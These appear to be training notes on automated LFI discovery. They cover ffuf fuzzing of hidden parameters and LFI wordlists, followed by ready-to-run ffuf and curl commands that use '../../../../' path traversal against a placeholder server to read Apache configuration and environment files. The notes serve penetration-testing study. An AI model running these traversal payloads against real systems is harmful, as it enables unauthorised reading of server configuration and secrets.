8.Automated-scanning

Key Takeaways:

  • Importance of Manual Testing:

    • Emphasizes that automated scanning is not a replacement for manual testing.

    • Custom payloads and techniques are often required for complex vulnerabilities.

    • Bypassing WAFs and firewalls requires in-depth understanding.

  • Fuzzing Parameters:

    • Using ffuf to discover hidden GET/POST parameters.

    • Highlighting that hidden parameters may be less secure.

    • Providing a link to common LFI parameters.

  • LFI Wordlists:

    • Using wordlists like LFI-Jhaddix.txt to automate LFI payload testing.

    • Demonstrating how to use ffuf with LFI wordlists.

    • Good explanation of how to verify the wordlists results.

  • Fuzzing Server Files:

    • Fuzzing for server webroot paths, configuration files, and log files.

    • Providing links to Linux and Windows webroot wordlists.

    • Demonstrating how to find server configurations and log paths.

    • Good explanation of how to follow file paths, and find needed information.

  • LFI Tools:

    • Mentioning popular LFI tools like LFISuite, LFiFreak, and liffy.

    • Acknowledging that many tools are outdated and rely on Python 2.

    • Good advice to test the tools, to see their accuracy.

Additional Considerations:

  • Tool Limitations:

    • Automated tools may miss complex vulnerabilities or bypasses.

    • False positives and false negatives are common.

    • Tools need to be updated to be effective.

  • Wordlist Selection:

    • Choosing appropriate wordlists is crucial for effective scanning.

    • Custom wordlists may be needed for specific applications.

  • WAF Evasion:

    • Automated tools may not be effective against advanced WAFs.

    • Manual testing and payload crafting are often required.

  • Ethical Considerations:

    • Automated scanning should only be performed on systems with explicit permission.

    • Avoid causing denial-of-service (DoS) attacks.

  • Scripting:

    • Writing custom scripts can be a very effective way to automate the scanning process.

    • Python is a very useful language for this task.

  • Regular Expressions:

    • When dealing with large amounts of data from log files, or configuration files, regular expressions are very useful.

# Discovering hidden parameters
ffuf -w /opt/useful/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ \
    -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287  

# Finding LFI vulnerabilities using wordlists
ffuf -w /opt/useful/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ \
    -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287  

# Searching for default web root directories on Linux
ffuf -w /opt/useful/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ \
    -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287  

# Using a custom LFI wordlist
ffuf -w ./LFI-WordList-Linux:FUZZ \
    -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287

curl (HTTP Request Tool)

A command-line tool for transferring data with URLs, commonly used for making HTTP requests.

Examples:

# Accessing a sensitive configuration file
curl http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/apache2.conf  

# Extracting environment variables from the server
curl http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/envvars

Key Points:

  • The primary tools used are ffuf for fuzzing and curl for making HTTP requests.

  • This guide focuses on Linux-based web servers and file inclusion vulnerabilities.

Previous3.Automation and PreventionNext9.File-inclusion-prevention

Last updated